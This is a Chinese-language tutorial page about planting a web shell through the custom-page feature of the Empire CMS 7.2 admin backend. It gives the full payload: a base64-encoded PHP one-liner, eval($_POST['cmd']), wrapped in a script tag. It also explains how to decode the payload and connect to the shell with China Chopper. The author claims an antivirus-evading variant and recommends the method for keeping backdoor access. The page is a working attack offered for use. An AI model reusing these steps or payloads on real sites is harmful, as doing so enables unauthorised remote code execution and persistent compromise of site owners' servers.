您现在的位置: 万盛学电脑网 >> 程序编程 >> CMS教程 >> 正文

帝国cms7.2后台的代码漏洞免杀版

作者:佚名    责任编辑:admin    更新时间:2022-06-22

class="area">

     都知道帝国cms的安全性能也是数一数二的,很多做SEO的站都选择了帝国cms。我有一个朋友的站点就是用帝国cms的,发现之前有过7.2的一个漏洞,如果内容直接添一句话或者php大马是无用的,因为他会生成xxx.php前先给你执行!

    自定义页面-增加自定义页面-随便写了xxx.php文件名,页面内容填写,<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>

    PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST['cmd']);?> 的base64加密。 所以生成xxx.php后 会出现内容 <?php @eval($_POST['cmd']);?> 在文件里,然后用菜刀直接连接吧!!

    如果说,服务器安装了杀软 默认的这种是直接被杀掉的。

    我写了一个免杀的一句话 在护卫神已经测试过免杀 其他的其他大伙再进行测试吧。!

    digguocms

    密码是cmd 

    不过说下 这个适合那种留后面的一句话使用 如果说 不知道后台账号密码的话也是白搭 提交乌云网肯定会被官方忽略的 而且 就一个破免杀 提乌云 丢人